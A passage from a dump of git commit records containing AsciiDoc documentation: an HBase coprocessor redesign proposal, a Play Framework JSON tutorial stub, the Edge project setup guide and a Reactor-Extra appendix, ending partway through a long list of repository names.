...\n}\n----\n\n=== New design\n\n[source,java]\n----\ninterface Coprocessor {\n ...\n}\n\n\/\/ Extend pattern-of-4 to coprocessors.\ninterface RegionCoprocessor extends Coprocessor {\n RegionObserver getRegionObserver();\n BulkLoadObserver getBulkLoadObserver();\n EndpointObserver getEndpointObserver();\n Service getService();\n}\n\n\/\/ Tie coprocessor to environment\ninterface CoprocessorEnvironment<C extends Coprocessor> {\n C getInstance();\n ...\n}\n\nabstract class CoprocessorHost<C extends Coprocessor, E extends CoprocessorEnvironment<C>> {\n ...\n}\n\n\/\/ Doesn\u2019t extend coprocessor\ninterface RegionObserver extends Coprocessor {\n \u2026\n}\n\n\/\/ Doesn\u2019t extend coprocessor\ninterface BulkLoadObserver extends Coprocessor {\n \u2026\n}\n----\n\n\n== How does it fix our issues?\n\n* Fix #1: CoprocessorHost is now tied to types of coprocessors it can serve by template argument C.\nDuring load time, it can ignore any coprocessors which don\u2019t match.\n* Fix #2 and #3: Pull the duplicate functions into CoprocessorHost class. Individual host subclasses\ncan use these directly. One interesting part here is ObserverGetter<C, O>. For any specific hook,\nsay in observer O, subclasses specify ObserverGetter<C, O> so that the shared methods can extract\nobserver O from coprocessor C.\n* Fix #4: Choosing composition over inheritance, by adding getter functions in coprocessors (e.g.\ngetRegionObserver()), implementations can now break up observer implementations into separate\nclasses. For e.g. our AccessController will now just be:\n`class AccessController implements AccessControlService.Interface, CoprocessorService`\n\n[[migrating.existing.cps.to.new.design]]\n== Migrating existing CPs to new design\n\nThere\u2019s a simple and small fix that can migrate existing coprocessors to the new design. +\nIf we had the following observer in the old design: +\n----\nclass FooObserver implements RegionObserver {\n...\n...\n}\n----\n\nIt can be \u201cmade to work\u201d with the new design like this: +\n----\nclass FooObserver implements RegionCoprocessor, RegionObserver {\n public RegionObserver getRegionObserver() { return this; }\n ...\n ...\n}\n----\n\nHowever, note that this is only a workaround to quickly migrate ~100 CPs in our code base to new\ndesign without creating new classes and files. *New CPs should NOT follow this pattern.*\n\n== Additional Benefit\n\n* Cleaner solution to https:\/\/issues.apache.org\/jira\/browse\/HBASE-17106[HBASE-17106].\n* We can have multiple observer interfaces for each environment now. For e.g We can break our single\n monolithic MasterObsever (~150 functions) to multiple observer interfaces - ScannerObserver,\n AMObserver, etc.\n* These observers can be assigned different compatibility guarantees. For instances, new hooks by\nBackup feature could have been put into separate Observer and marked IS.Unstable, while features\nwhich have hardened over years can be marked IS.Stable.\n* Only the coprocessors corresponding to hosts which support endpoint service will have\n\u201cgetService()\u201d method. So WALCoprocessor which cannot support service doesn\u2019t have one. That may\nlook minor thing. But if our design can cleanly convey what is and isn\u2019t supported, that\u2019s beautiful\nand powerful and helpful for downstream developers.\n\n\n","old_contents":"= Coprocessor Design Improvements (link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-17732[HBASE-17732])\n\nAuthor: Apekshit Sharma\n\n== Introduction\n\nThis doc explains current design of Coprocessor feature in brief, few issues I noticed, and\nsuggestions on how to fix them & further improve overall design.\n\n*TL;DR* +\nWe are moving from\n\n* Observer *is* Coprocessor\n* FooService *is* CoprocessorService\n\nTo\n\n* Coprocessor *has* Observer\n* Coprocessor *has* Service\n\nSee code example in <<main.design.change.suggestions>>.\n\n== Terminology\n\nhooks = functions in observers. Named because third-party use these functions to \u201chook up\u201d custom\nlogic to internal code paths.\n\n[[background]]\n== Background\n\nCoprocessors are well link:http:\/\/hbase.apache.org\/book.html#cp[documented in the refguide].\n\nHere we give a little background information on involved classes, their responsibilities, and\nrelationship to each other.\n\n* Main classes\n** Coprocessor (interface)\n*** All *Observer* interfaces derive from Coprocessor interface.\n**** Coprocessor Interface is a _Marker _Interface. It just has start\/stop methods and enums for\nstages in the Coprocessor Lifecycle.\n** http:\/\/hbase.apache.org\/book.html#_observer_coprocessors[Observers] (interface)\n*** Contain hooks which third-party programs can override to inject functionality in various\ninternal code paths. For e.g preCreateTable(...) will be called just before any table is created.\n*** Current set of observers: _MasterObserver, RegionObserver, RegionServerObserver, WALObserver,\nEndpointObserver, BulkLoadObserver._\n** CoprocessorEnvironment (interface)\n*** Encapsulates a coprocessor instance and other information like versions, priority, etc.\n*** Coprocessor implementations use it to get access to tables.\n*** Four main implementations: _MasterEnvironment, RegionEnvironment, RegionServerEnvironment,\nWALEnvironment._\n** CoprocessorHost (abstract class)\n*** Responsible for loading coprocessors\n*** Four concrete sub-classes: MasterCoprocessorHost, RegionCoprocessorHost,\nRegionServerCoprocessorHost, WALCoprocessorHost\n*** Each host is tied to corresponding environment type using template argument \u2018E\u2019.\n\n== Problems\n\n* CoprocessorEnvironment has `Coprocessor getInstance()`. Since Observer types which can be\nhandled by an environment are not statically tied to it, coprocessor hosts (which are statically\ntied to Environment) don\u2019t know which kind of coprocessors are relevant to them, i.e.\nMasterCoprocessorHost is tied to MasterEnvironment, but it doesn\u2019t know that it can only handle\nMasterObserver(s). As a result:\n** Problem 1: All hosts load all observers i.e. MasterCoprocessorHost will also load RegionObserver\nand other observers.\n** Problem 2: Hosts use runtime checks likes `observer instanceOf ExpectedObserver` in\nexecOperation and other functions to filter out incompatible observers.\n** Problem 3: Many redundant functions in every implementation of coprocessor host.\n* Observer *extends* Coprocessor (inheritance)\n** Problem 4: Any third-party coprocessor which wants to use many observers will have to extend all\nof them in same class. For eg.\nclass AccessController implements MasterObserver,\n RegionObserver, RegionServerObserver, EndpointObserver,\n BulkLoadObserver, AccessControlService.Interface,\n CoprocessorService\nThat results in big classes with 100+ functions.\n\n== Proposed Solutions\n\n* There are 6 types of observers (listed in <<background>> section above), but just 4 types of\nCoprocessorEnvironment. So some XEnvironment has to be handling multiple Observers\n(RegionEnvironment serves RegionObserver, EndpointObserver and BulkLoadObservers). Our aim is to\nstatically tie environment to types of observers it can serve. There are two alternative choices\nhere:\n** Option 1: Limit to 4 types of Observers. That fits nicely in our pattern-of-4\n(4 hosts, 4 environments, 4 observers) and will make the overall design simpler. Although it may\nlook simple at surface, it\u2019ll actually lead to a single large observer interface which will only\ngrow and may contain 100s of hooks in future (master already has 100+)\n** Option 2: Use multiple observers to group together similar kinds of hooks.\nLike we have RegionObserver, EndpointObserver and BulkLoadObserver; we can have ScannerObserver,\nAMObserver, etc instead of single MasterObserver. Benefits being\n*** Proper encapsulation of related hooks and separation from unrelated hooks\n*** We can give different Stability guarantees for different set of hooks. Something which\u2019ll make\nour CP compat management much easier.\n\nI believe Option 2 to be better than Option 1, and the design changes suggested later are based on\nOption 2.\n\n* For problem 4, we should replace inheritance with composition, so developers have choice to\nbreak out observer implementations into separate classes.\n\n[[main.design.change.suggestions]]\n== Main Design Change suggestions\n\n* Extend pattern-of-4 up to coprocessor.\n+\nCoprocessorHost \u2192 Env \u2192 Coprocessor\n* Tie each CoprocessorEnvironment to corresponding Coprocessor\n* Use composition instead of inheritance between Coprocessor and Observers.\n\n=== Current design\n\nOnly changing parts are mentioned here. Anything not changing is represented by \u201c...\u201d\n\n[source,java]\n----\ninterface Coprocessor {\n ...\n}\n\ninterface CoprocessorEnvironment {\n Coprocessor getInstance();\n ...\n}\n\ninterface CoprocessorService {\n Service getService();\n}\n\nabstract class CoprocessorHost<E extends CoprocessorEnvironment> {\n ...\n}\n\ninterface RegionObserver extends Coprocessor {\n ...\n}\n\ninterface BulkLoadObserver extends Coprocessor {\n ...\n}\n\ninterface EndpointObserver extends Coprocessor {\n ...\n}\n----\n\n=== New design\n\n[source,java]\n----\ninterface Coprocessor {\n ...\n}\n\n\/\/ Extend pattern-of-4 to coprocessors.\ninterface RegionCoprocessor extends Coprocessor {\n RegionObserver getRegionObserver();\n BulkLoadObserver getBulkLoadObserver();\n EndpointObserver getEndpointObserver();\n Service getService();\n}\n\n\/\/ Tie coprocessor to environment\ninterface CoprocessorEnvironment<C extends Coprocessor> {\n C getInstance();\n ...\n}\n\nabstract class CoprocessorHost<C extends Coprocessor, E extends CoprocessorEnvironment<C>> {\n ...\n}\n\n\/\/ Doesn\u2019t extend coprocessor\ninterface RegionObserver extends Coprocessor {\n \u2026\n}\n\n\/\/ Doesn\u2019t extend coprocessor\ninterface BulkLoadObserver extends Coprocessor {\n \u2026\n}\n----\n\n\n== How does it fix our issues?\n\n* Fix #1: CoprocessorHost is now tied to types of coprocessors it can serve by template argument C.\nDuring load time, it can ignore any coprocessors which don\u2019t match.\n* Fix #2 and #3: Pull the duplicate functions into CoprocessorHost class. Individual host subclasses\ncan use these directly. One interesting part here is ObserverGetter<C, O>. For any specific hook,\nsay in observer O, subclasses specify ObserverGetter<C, O> so that the shared methods can extract\nobserver O from coprocessor C.\n* Fix #4: Choosing composition over inheritance, by adding getter functions in coprocessors (e.g.\ngetRegionObserver()), implementations can now break up observer implementations into separate\nclasses. For e.g. our AccessController will now just be:\n`class AccessController implements AccessControlService.Interface, CoprocessorService`\n\n[[migrating.existing.cps.to.new.design]]\n== Migrating existing CPs to new design\n\nThere\u2019s a simple and small fix that can migrate existing coprocessors to the new design. +\nIf we had the following observer in the old design: +\n----\nclass FooObserver implements RegionObserver {\n...\n...\n}\n----\n\nIt can be \u201cmade to work\u201d with the new design like this: +\n----\nclass FooObserver implements RegionCoprocessor, RegionObserver {\n public RegionObserver getRegionObserver() { return this; }\n ...\n ...\n}\n----\n\nHowever, note that this is only a workaround to quickly migrate ~100 CPs in our code base to new\ndesign without creating new classes and files. *New CPs should NOT follow this pattern.*\n\n== Additional Benefit\n\n* Cleaner solution to https:\/\/issues.apache.org\/jira\/browse\/HBASE-17106[HBASE-17106].\n* We can have multiple observer interfaces for each environment now. For e.g We can break our single\n monolithic MasterObsever (~150 functions) to multiple observer interfaces - ScannerObserver,\n AMObserver, etc.\n* These observers can be assigned different compatibility guarantees. For instances, new hooks by\nBackup feature could have been put into separate Observer and marked IS.Unstable, while features\nwhich have hardened over years can be marked IS.Stable.\n* Only the coprocessors corresponding to hosts which support endpoint service will have\n\u201cgetService()\u201d method. So WALCoprocessor which cannot support service doesn\u2019t have one. That may\nlook minor thing. But if our design can cleanly convey what is and isn\u2019t supported, that\u2019s beautiful\nand powerful and helpful for downstream developers.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11937736382f5d450eb371eadcd8fe029268b5d6","subject":"Update 2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","message":"Update 2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_file":"_posts\/2016-08-15-Play-Framework-Beginner-Tutorial-How-to-handle-a-big-json-file-in-play-more-than-22-root-variables.adoc","new_contents":"# Play Framework - Beginner Tutorial : How to handle a big json file in play ( more than 22 root variables)\n\n:published_at: 2016-08-15\n:hp-tags: play\n\nIt is not a good practice to have such a big json with many root variables. Nevertheless, we might need to call a rest api that will give a json like this\n\n```\n{ \"a1\": ..., \"a2\" : ..., \"a3\" : ..., \"a4\" : ..., \"a5\" : ..., \"a6\" : ..., \"a7\" : ..., \"a8\" : ..., \"a9\" : ..., \"a10\" : ..., \"a11\" : ..., \"a12\" : ..., \"a13\" : ..., \"a14\" : ..., \"a15\" : ..., \"a16\" : ..., \"a17\" : ..., \"a18\" : ..., \"a19\" : ..., \"a20\" : ..., \"a21\": ..., \"a22\" : ..., \"a23\" : ..., \"a24\" : ..., ....}\n\n\n\n","old_contents":"# Play Framework - Beginner Tutorial : How to handle a big json file in play ( more than 22 root variables)\n\n:published_at: 2016-08-15\n:hp-tags: play\n\nIt is not a good practice to have such a big json with many root variables. Nevertheless, we might need to call a rest api that will give a json like this\n\n'''\n{ \"a1\": ..., \"a2\" : ..., \"a3\" : ..., \"a4\" : ..., \"a5\" : ..., \"a6\" : ..., \"a7\" : ..., \"a8\" : ..., \"a9\" : ..., \"a10\" : ..., \"a11\" : ..., \"a12\" : ..., \"a13\" : ..., \"a14\" : ..., \"a15\" : ..., \"a16\" : ..., \"a17\" : ..., \"a18\" : ..., \"a19\" : ..., \"a20\" : ..., \"a21\": ..., \"a22\" : ..., \"a23\" : ..., \"a24\" : ..., ....}\n\n'''\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"25e0acda0103b5134b0dad4303cabaf320472ef9","subject":"Add documentation for cloning in setup","message":"Add documentation for cloning in setup\n","repos":"juxt\/edge,juxt\/edge","old_file":"doc\/resources\/doc\/sources\/setup.adoc","new_file":"doc\/resources\/doc\/sources\/setup.adoc","new_contents":"= How to build your own project upon Edge\n\nEdge is designed to be built upon.\nYou are free to make whatever changes you like (additions and deletions), in accordance with the <<_license>> (MIT).\n\n== Create a repository\n\nIf you don't have a remote repository already (e.g. on GitHub), here's how to create a new local one:\n\n[source,shell]\n----\nsrc$ mkdir acme\nsrc$ cd acme\nacme$ git init\n----\n\nIf you already have a repository, you can clone it like so:\n\n[source,shell]\n----\nsrc$ git clone git@github.com:acme\/acme.git\nsrc$ cd acme\n----\n\n== Add Edge to your project\n\nOnce you have your repository, you can add Edge as a remote, and incorporate it in:\n\n[source,shell]\n----\nacme$ git remote add edge https:\/\/github.com\/juxt\/edge.git\nacme$ git pull edge master\n----\n\n== Add a remote later (optional)\n\nIt's a good idea to have somewhere to back up your commits.\n\nFor example, if you create a new repository on GitHub called `acme` under the organisation `acme`, you could add the repository to your project like this:\n\n.Create a git remote\n[source,shell]\n----\nacme$ git remote add origin git@github.com:acme\/acme.git\nacme$ git push -u origin master\n----\n\n== Create a new app\n\nWith your new project created, you're ready to create an app.\nApps are deps.edn projects within Edge which are intended to be run as a server.\n\nFrom the root of the repo, run the `.\/bin\/app` script.\nIt can be run with an optional flags which add support for Sass or Clojurescript, these are `--sass` and `--cljs` respectively.\n\n[NOTE]\n====\nYour project name should be namespaced to match your application.\nIf your company was named \"Acme\" you might use \"acme\/api\" or \"com.acme\/api\".\n\nIf you're unsure, use your company name at work, or your github username for hobby projects.\nThere's a low chance of conflicts in an application.\n\nThe project namespace will determine the Clojure namespaces within your application.\n====\n\n[source,shell]\n----\nedge$ .\/bin\/app acme\/api\nedge$ .\/bin\/app acme\/blog --sass\nedge$ .\/bin\/app acme\/dashboard --cljs\nedge$ .\/bin\/app acme\/radar --sass --cljs\n----\n\n== Next steps\n\n<<dev-guide.adoc#,Learn Edge's development environment>>.\n\n== License\n\n----\nThe MIT License (MIT)\n\nCopyright \u00a9 2016-2019 JUXT LTD.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal in\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and\/or sell copies of\nthe Software, and to permit persons to whom the Software is furnished to do so,\nsubject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n----\n","old_contents":"= How to build your own project upon Edge\n\nEdge is designed to be built upon.\nYou are free to make whatever changes you like (additions and deletions), in accordance with the <<_license>> (MIT).\n\n== Create a new project\n\n.Create new project\n[source,shell]\n----\nsrc$ mkdir acme\nsrc$ cd acme\nacme$ git init\nacme$ git remote add edge https:\/\/github.com\/juxt\/edge.git\nacme$ git pull edge master\n----\n\n== Create a remote (optional)\n\nIt's a good idea at this point to have somewhere to back up your commits.\n\nFor example, if you create a new repository on GitHub called `acme` under the organisation `acme`, you could add the repository to your project like this:\n\n.Create a git remote\n[source,shell]\n----\nacme$ git remote add origin git@github.com:acme\/acme.git\nacme$ git push -u origin master\n----\n\n== Create a new app\n\nWith your new project created, you're ready to create an app.\nApps are deps.edn projects within Edge which are intended to be run as a server.\n\nFrom the root of the repo, run the `.\/bin\/app` script.\nIt can be run with an optional flags which add support for Sass or Clojurescript, these are `--sass` and `--cljs` respectively.\n\n[NOTE]\n====\nYour project name should be namespaced to match your application.\nIf your company was named \"Acme\" you might use \"acme\/api\" or \"com.acme\/api\".\n\nIf you're unsure, use your company name at work, or your github username for hobby projects.\nThere's a low chance of conflicts in an application.\n\nThe project namespace will determine the Clojure namespaces within your application.\n====\n\n[source,shell]\n----\nedge$ .\/bin\/app acme\/api\nedge$ .\/bin\/app acme\/blog --sass\nedge$ .\/bin\/app acme\/dashboard --cljs\nedge$ .\/bin\/app acme\/radar --sass --cljs\n----\n\n== Next steps\n\n<<dev-guide.adoc#,Learn Edge's development environment>>.\n\n== License\n\n----\nThe MIT License (MIT)\n\nCopyright \u00a9 2016-2019 JUXT LTD.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal in\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and\/or sell copies of\nthe Software, and to permit persons to whom the Software is furnished to do so,\nsubject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5e5917bfb236b1b0c8704118188df3669b4dfa72","subject":"[guide] Remove ref to Swing\/SwtScheduler in addons appendix (#2959)","message":"[guide] Remove ref to Swing\/SwtScheduler in addons appendix (#2959)\n\nSee \ufeffhttps:\/\/github.com\/reactor\/reactor-addons\/issues\/273","repos":"reactor\/reactor-core","old_file":"docs\/asciidoc\/apdx-reactorExtra.adoc","new_file":"docs\/asciidoc\/apdx-reactorExtra.adoc","new_contents":"[[reactor-extra]]\n= Reactor-Extra\n\nThe `reactor-extra` artifact contains additional operators and utilities that are for\nusers of `reactor-core` with advanced needs, or incubating operators.\n\nAs this is a separate artifact, you need to explicitly add it to your build. The following\nexample shows how to do so in Gradle:\n\n====\n[source,groovy]\n----\ndependencies {\n compile 'io.projectreactor:reactor-core'\n compile 'io.projectreactor.addons:reactor-extra' <1>\n}\n----\n<1> Add the reactor extra artifact in addition to core. See <<getting>> for details\nabout why you do not need to specify a version if you use the BOM, usage in Maven, and other details.\n====\n\n[[extra-tuples]]\n== `TupleUtils` and Functional Interfaces\n\nThe `reactor.function` package contains functional interfaces that complement the Java 8\n`Function`, `Predicate`, and `Consumer` interfaces, for three to eight values.\n\n`TupleUtils` offers static methods that act as a bridge between lambdas of these functional\ninterfaces to a similar interface on the corresponding `Tuple`.\n\nThis lets you easily work with independent parts of any `Tuple`, as the following example shows:\n\n====\n[source,java]\n----\n.map(tuple -> {\n String firstName = tuple.getT1();\n String lastName = tuple.getT2();\n String address = tuple.getT3();\n\n return new Customer(firstName, lastName, address);\n});\n----\n====\n\nYou can rewrite the preceding example as follows:\n\n====\n[source,java]\n----\n.map(TupleUtils.function(Customer::new)); \/\/ <1>\n----\n<1> (as `Customer` constructor conforms to `Function3` functional interface signature)\n====\n\n[[extra-math]]\n== Math Operators With `MathFlux`\n\nThe `reactor.math` package contains a `MathFlux` specialized version of `Flux` that offers\nmathematical operators, including `max`, `min`, `sumInt`, `averageDouble`, and others.\n\n[[extra-schedulers]]\n== Schedulers\n\nReactor-extra comes with the `ForkJoinPoolScheduler` (in the `reactor.scheduler.forkjoin` package): it uses the Java `ForkJoinPool` to execute tasks.\n","old_contents":"[[reactor-extra]]\n= Reactor-Extra\n\nThe `reactor-extra` artifact contains additional operators and utilities that are for\nusers of `reactor-core` with advanced needs.\n\nAs this is a separate artifact, you need to explicitly add it to your build. The following\nexample shows how to do so in Gradle:\n\n====\n[source,groovy]\n----\ndependencies {\n compile 'io.projectreactor:reactor-core'\n compile 'io.projectreactor.addons:reactor-extra' <1>\n}\n----\n<1> Add the reactor extra artifact in addition to core. See <<getting>> for details\nabout why you do not need to specify a version if you use the BOM, usage in Maven, and other details.\n====\n\n[[extra-tuples]]\n== `TupleUtils` and Functional Interfaces\n\nThe `reactor.function` package contains functional interfaces that complement the Java 8\n`Function`, `Predicate`, and `Consumer` interfaces, for three to eight values.\n\n`TupleUtils` offers static methods that act as a bridge between lambdas of these functional\ninterfaces to a similar interface on the corresponding `Tuple`.\n\nThis lets you easily work with independent parts of any `Tuple`, as the following example shows:\n\n====\n[source,java]\n----\n.map(tuple -> {\n String firstName = tuple.getT1();\n String lastName = tuple.getT2();\n String address = tuple.getT3();\n\n return new Customer(firstName, lastName, address);\n});\n----\n====\n\nYou can rewrite the preceding example as follows:\n\n====\n[source,java]\n----\n.map(TupleUtils.function(Customer::new)); \/\/ <1>\n----\n<1> (as `Customer` constructor conforms to `Function3` functional interface signature)\n====\n\n[[extra-math]]\n== Math Operators With `MathFlux`\n\nThe `reactor.math` package contains a `MathFlux` specialized version of `Flux` that offers\nmathematical operators, including `max`, `min`, `sumInt`, `averageDouble`, and others.\n\n[[extra-schedulers]]\n== Schedulers\n\nReactor-extra comes with several specialized schedulers:\n\n* `ForkJoinPoolScheduler` (in the `reactor.scheduler.forkjoin` package): Uses the Java `ForkJoinPool` to execute tasks.\n* `SwingScheduler` (in the `reactor.swing` package): Runs tasks in the Swing UI event loop thread, the `EDT`.\n* `SwtScheduler` (in the `reactor.swing` package): Runs tasks in the SWT UI event loop thread.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6856cfc5e30fd1d5bc05a125217cb07b666a86ec","subject":"add reference for ember-data-elasticsearch-kit to integrations page","message":"add reference for ember-data-elasticsearch-kit to integrations page\n","repos":"ckclark\/elasticsearch,PhaedrusTheGreek\/elasticsearch,nazarewk\/elasticsearch,EasonYi\/elasticsearch,strapdata\/elassandra,JervyShi\/elasticsearch,sauravmondallive\/elasticsearch,Ansh90\/elasticsearch,mjason3\/elasticsearch,i-am-Nathan\/elasticsearch,kimimj\/elasticsearch,fubuki\/elasticsearch,jeteve\/elasticsearch,yanjunh\/elasticsearch,weipinghe\/elasticsearch,Uiho\/elasticsearch,aglne\/elasticsearch,vvcephei\/elasticsearch,likaiwalkman\/elasticsearch,mcku\/elasticsearch,skearns64\/elasticsearch,queirozfcom\/elasticsearch,kevinkluge\/elasticsearch,JSCooke\/elasticsearch,weipinghe\/elasticsearch,tebriel\/elasticsearch,thecocce\/elasticsearch,kevinkluge\/elasticsearch,MaineC\/elasticsearch,linglaiyao1314\/elasticsearch,andrejserafim\/elasticsearch,zhiqinghuang\/elasticsearch,ImpressTV\/elasticsearch,amit-shar\/elasticsearch,StefanGor\/elasticsearch,jango2015\/elasticsearch,xingguang2013\/elasticsearch,ulkas\/elasticsearch,janmejay\/elasticsearch,snikch\/elasticsearch,ricardocerq\/elasticsearch,tcucchietti\/elasticsearch,pozhidaevak\/elasticsearch,micpalmia\/elasticsearch,alexbrasetvik\/elasticsearch,JervyShi\/elasticsearch,petabytedata\/elasticsearch,kubum\/elasticsearch,sjohnr\/elasticsearch,uboness\/elasticsearch,fekaputra\/elasticsearch,drewr\/elasticsearch,mapr\/elasticsearch,Charlesdong\/elasticsearch,himanshuag\/elasticsearch,TonyChai24\/ESSource,dpursehouse\/elasticsearch,mute\/elasticsearch,kimimj\/elasticsearch,adrianbk\/elasticsearch,MetSystem\/elasticsearch,iamjakob\/elasticsearch,mgalushka\/elasticsearch,yuy168\/elasticsearch,ulkas\/elasticsearch,yynil\/elasticsearch,sposam\/elasticsearch,lydonchandra\/elasticsearch,vingupta3\/elasticsearch,weipinghe\/elasticsearch,hechunwen\/elasticsearch,mjason3\/elasticsearch,yanjunh\/elasticsearch,pranavraman\/elasticsearch,springning\/elasticsearch,AndreKR\/elasticsearch,zhaocloud\/elasticsearch,smflorentino\/elasticsearch,kalburgimanjunath\/elasticsearch,phani546\/elasticsearch,elasticdog\/elasticsearch,ckclark\/elasticsearch,vrkansagara\/elasticsearch,golubev\/elasticsearch,smflorentino\/elasticsearch,kevinkluge\/elasticsearch,nomoa\/elasticsearch,brwe\/elasticsearch,ajhalani\/elasticsearch,marcuswr\/elasticsearch-dateline,golubev\/elasticsearch,alexbrasetvik\/elasticsearch,fernandozhu\/elasticsearch,HarishAtGitHub\/elasticsearch,fooljohnny\/elasticsearch,skearns64\/elasticsearch,kenshin233\/elasticsearch,wimvds\/elasticsearch,infusionsoft\/elasticsearch,Brijeshrpatel9\/elasticsearch,abibell\/elasticsearch,masaruh\/elasticsearch,sdauletau\/elasticsearch,Kakakakakku\/elasticsearch,abibell\/elasticsearch,nknize\/elasticsearch,NBSW\/elasticsearch,lydonchandra\/elasticsearch,mrorii\/elasticsearch,LeoYao\/elasticsearch,wenpos\/elasticsearch,kimimj\/elasticsearch,SergVro\/elasticsearch,zkidkid\/elasticsearch,lightslife\/elasticsearch,JackyMai\/elasticsearch,huanzhong\/elasticsearch,bestwpw\/elasticsearch,liweinan0423\/elasticsearch,socialrank\/elasticsearch,obourgain\/elasticsearch,aparo\/elasticsearch,markllama\/elasticsearch,alexshadow007\/elasticsearch,tahaemin\/elasticsearch,btiernay\/elasticsearch,robin13\/elasticsearch,ivansun1010\/elasticsearch,YosuaMichael\/elasticsearch,Kakakakakku\/elasticsearch,strapdata\/elassandra-test,shreejay\/elasticsearch,kubum\/elasticsearch,tahaemin\/elasticsearch,mgalushka\/elasticsearch,socialrank\/elasticsearch,cwurm\/elasticsearch,MetSystem\/elasticsearch,acchen97\/elasticsearch,fooljohnny\/elasticsearch,loconsolutions\/elasticsearch,vvcephei\/elasticsearch,rhoml\/elasticsearch,nrkkalyan\/elasticsearch,rajanm\/elasticsearch,hafkensite\/elasticsearch,Rygbee\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,petmit\/elasticsearch,Asimov4\/elasticsearch,dantuffery\/elasticsearch,mapr\/elasticsearch,nknize\/elasticsearch,nomoa\/elasticsearch,PhaedrusTheGreek\/elasticsearch,iamjakob\/elasticsearch,mohit\/elasticsearch,milodky\/elasticsearch,kunallimaye\/elasticsearch,maddin2016\/elasticsearch,onegambler\/elasticsearch,kubum\/elasticsearch,jsgao0\/elasticsearch,salyh\/elasticsearch,hechunwen\/elasticsearch,AshishThakur\/elasticsearch,hanswang\/elasticsearch,Flipkart\/elasticsearch,btiernay\/elasticsearch,Rygbee\/elasticsearch,ricardocerq\/elasticsearch,gingerwizard\/elasticsearch,kenshin233\/elasticsearch,szroland\/elasticsearch,marcuswr\/elasticsearch-dateline,TonyChai24\/ESSource,karthikjaps\/elasticsearch,slavau\/elasticsearch,Shekharrajak\/elasticsearch,Uiho\/elasticsearch,mm0\/elasticsearch,queirozfcom\/elasticsearch,rajanm\/elasticsearch,xpandan\/elasticsearch,wuranbo\/elasticsearch,polyfractal\/elasticsearch,strapdata\/elassandra-test,mute\/elasticsearch,himanshuag\/elasticsearch,micpalmia\/elasticsearch,snikch\/elasticsearch,sjohnr\/elasticsearch,nazarewk\/elasticsearch,ZTE-PaaS\/elasticsearch,petabytedata\/elasticsearch,sjohnr\/elasticsearch,mohit\/elasticsearch,zeroctu\/elasticsearch,uschindler\/elasticsearch,iamjakob\/elasticsearch,dylan8902\/elasticsearch,Liziyao\/elasticsearch,onegambler\/elasticsearch,gingerwizard\/elasticsearch,clintongormley\/elasticsearch,lmtwga\/elasticsearch,yongminxia\/elasticsearch,bestwpw\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ESamir\/elasticsearch,Flipkart\/elasticsearch,skearns64\/elasticsearch,Asimov4\/elasticsearch,StefanGor\/elasticsearch,winstonewert\/elasticsearch,karthikjaps\/elasticsearch,ESamir\/elasticsearch,weipinghe\/elasticsearch,luiseduardohdbackup\/elasticsearch,smflorentino\/elasticsearch,amaliujia\/elasticsearch,vroyer\/elasticassandra,ajhalani\/elasticsearch,obourgain\/elasticsearch,ouyangkongtong\/elasticsearch,henakamaMSFT\/elasticsearch,mjason3\/elasticsearch,szroland\/elasticsearch,Fsero\/elasticsearch,nellicus\/elasticsearch,JSCooke\/elasticsearch,markharwood\/elasticsearch,myelin\/elasticsearch,wayeast\/elasticsearch,alexksikes\/elasticsearch,kcompher\/elasticsearch,petmit\/elasticsearch,sarwarbhuiyan\/elasticsearch,naveenhooda2000\/elasticsearch,lzo\/elasticsearch-1,pritishppai\/elasticsearch,brandonkearby\/elasticsearch,hirdesh2008\/elasticsearch,myelin\/elasticsearch,adrianbk\/elasticsearch,wimvds\/elasticsearch,iantruslove\/elasticsearch,sauravmondallive\/elasticsearch,Uiho\/elasticsearch,caengcjd\/elasticsearch,ydsakyclguozi\/elasticsearch,Liziyao\/elasticsearch,fekaputra\/elasticsearch,sa